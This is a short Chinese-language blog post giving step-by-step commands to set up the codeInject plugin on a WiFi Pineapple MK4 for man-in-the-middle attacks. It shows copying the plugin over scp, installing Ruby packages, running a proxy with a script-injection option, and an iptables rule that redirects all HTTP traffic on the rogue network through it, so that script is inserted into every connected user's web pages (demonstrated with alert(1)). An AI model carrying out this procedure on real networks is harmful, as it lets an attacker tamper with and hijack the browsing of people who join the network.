標籤:signature scp res 中間人 class logs 維護 裝置 添加
如果在中間人攻擊的時候, 能在使用者的網頁中插入任意代碼, 可以說已經完成一半了
wifipineapple有個codeInject外掛程式, 可以讓連上這個網路所有裝置瀏覽網頁的時候, 在網頁中插入任意html代碼
但是目前我用的wifipineapple版本是MK4, 官方很久不維護這個版本的wifipineapple
使用scp把本地的codeinject傳到wifipineapple的 /pineapple/components/infusions/目錄下
scp -r codeinject [email protected]172.16.42.1:/pineapple/components/infusions
然後把opkg的源改成:
http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages/
執行
opkg updateopkg install ruby-cgiopkg install ruby-coreopkg install ruby-encopkg install ruby-gems
cd進入 /pineapple/components/infusions/codeinject 目錄,修正ruby執行socket, getAddrInfo的錯誤:
cp includes/install/socket.so /usr/lib/ruby/1.9/mips-linuxln -s /usb/usr/lib/ruby /usr/lib/ruby
cd進入 /pineapple/components/infusions/codeinject/includes/proxy 目錄, 執行命令:
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usb/lib:/usb/usr/libexport PATH=$PATH:/usb/usr/bin:/usb/usr/sbinruby -Kn proxy.rb --verbose --script-inject "<script>alert(1)</script>"
添加本機資料轉寄:
iptables -t nat -A PREROUTING -i br-lan -p tcp --destination-port 80 -j REDIRECT --to-ports 8888
此時串連上該wifi所有使用者,瀏覽網頁的時候,會彈出彈窗:1
EOF
NONO
出處:http://www.cnblogs.com/diligenceday/
企業網站:http://www.idrwl.com/
開源部落格:http://www.github.com/sqqihao
QQ:287101329
:18101055830
wifipineapple外掛程式:codeInject的使用